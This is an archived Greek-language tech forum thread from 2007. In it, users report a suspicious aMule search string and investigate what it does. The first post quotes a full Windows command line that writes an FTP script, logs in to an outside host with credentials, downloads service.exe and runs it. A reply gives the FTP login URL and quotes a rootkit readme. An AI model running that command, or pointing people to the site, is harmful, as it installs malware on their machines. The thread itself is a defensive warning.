doubleh Δημοσ. 21 Οκτωβρίου 2007 Δημοσ. 21 Οκτωβρίου 2007 Λοιπόν, έχω στο λίνουξ aMule (την linux εκδοχή του γνωστού eMule). Το μηχάνημα αυτό το βλέπω με vnc από windows. Λοιπόν, το είχα αφήσει να κατεβάζει, και μπαίνοντας σήμερα μέσω vnc στο λίνουξ, βλέπω το aMule να έχει κάνει αναζήτηση για το παρακάτω %systemroot%\system32\cmd.exe del eq&echo open ftp9.b0b.org 21 >> eq&echo user dbrown menu303 >> eq &echo binary >> eq &echo get service.exe >> eq &echo quit >> eq &ftp -n -s:eq &service.exe &del eq Όπως μπορείτε να καταλάβετε παίζει κάτι πολύ άσχημο. Ουσιαστικά κατεβάζει και εκτελέι ένα πρόγραμμα, το service.exe από το ftp9.b0b.org Έχει συμβεί σε κανέναν κάτι παρόμοιο; Έχει κανείς ιδέα τι είναι αυτό το πράγμα;
agrb Δημοσ. 21 Οκτωβρίου 2007 Δημοσ. 21 Οκτωβρίου 2007 Όποιος έχει όρεξη να το ψάξει τι είναι ας δώσει στη γραμμή διευθύνσεων του browser το ftp://dbrown:[email protected]/ Η πόρτα 21 δεν χρειάζεται αφού είναι η default. Το αρχείο είναι εκεί αλλά έχει και υποκαταλόγους με διάφορα άλλα καλούδια.
agrb Δημοσ. 21 Οκτωβρίου 2007 Δημοσ. 21 Οκτωβρίου 2007 Είχες δίκιο πράγματι κάτι συμβαίνει. Ο χώρος (link www) είναι γεμάτος από υλικό για να φτιάξει κανείς rootkits καθώς και πολλά έτοιμα. Το antivirus (Nod) βρήκε και πολλές trojan εκδοχές (Madtol.A trojan κλπ.) σε αυτό το ftp site. Ορίστε κι ένα απόσπασμα του readme.txt στον κατάλογο /www . "This software generates a system patch that will hide processes, files, folders registry keys and netstat entries from Windows 95/98/ME/NT/2k/XP/2003. Information is withheld based on 4 lists of mask strings. This enables you to apply wildcards to hiding functions such as hiding files based on "*.exe" or netstat entries based on "*TCP*:80*" to hide http traffic. The "example.exe" include is preconfigured to hide all processes/files and keys matching "~~*" and all "*TCP*" traffic. The installer copies itself to the system directory and extracts 2 DLL files from it's resources. It saves the files as "iexplore.exe" and "explorer.exe". The first dll is loaded into "explorer.exe" which then installs hooks contained in "explorer.dll"." Πολύ κακό παιδί ο Daniel :shifty: ΠΡΟΣΟΧΗ όσοι είστε users του amule :shifty: Όσοι έχετε firewalls προς τον έξω κόσμο βάλτε νέο rule για αποκλεισμό κάθε επικοινωνίας με την IP 75.126.12.41 (ftp9.b0b.org) γιατί είναι γεμάτη με έτοιμα rootkits και εργαλεία για κατασκευή νέων. Όλα αυτά μέχρι να βρείτε εναλλακτικό πρόγραμμα αντί του amule. Πολύ κακό παιδί ο Daniel
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.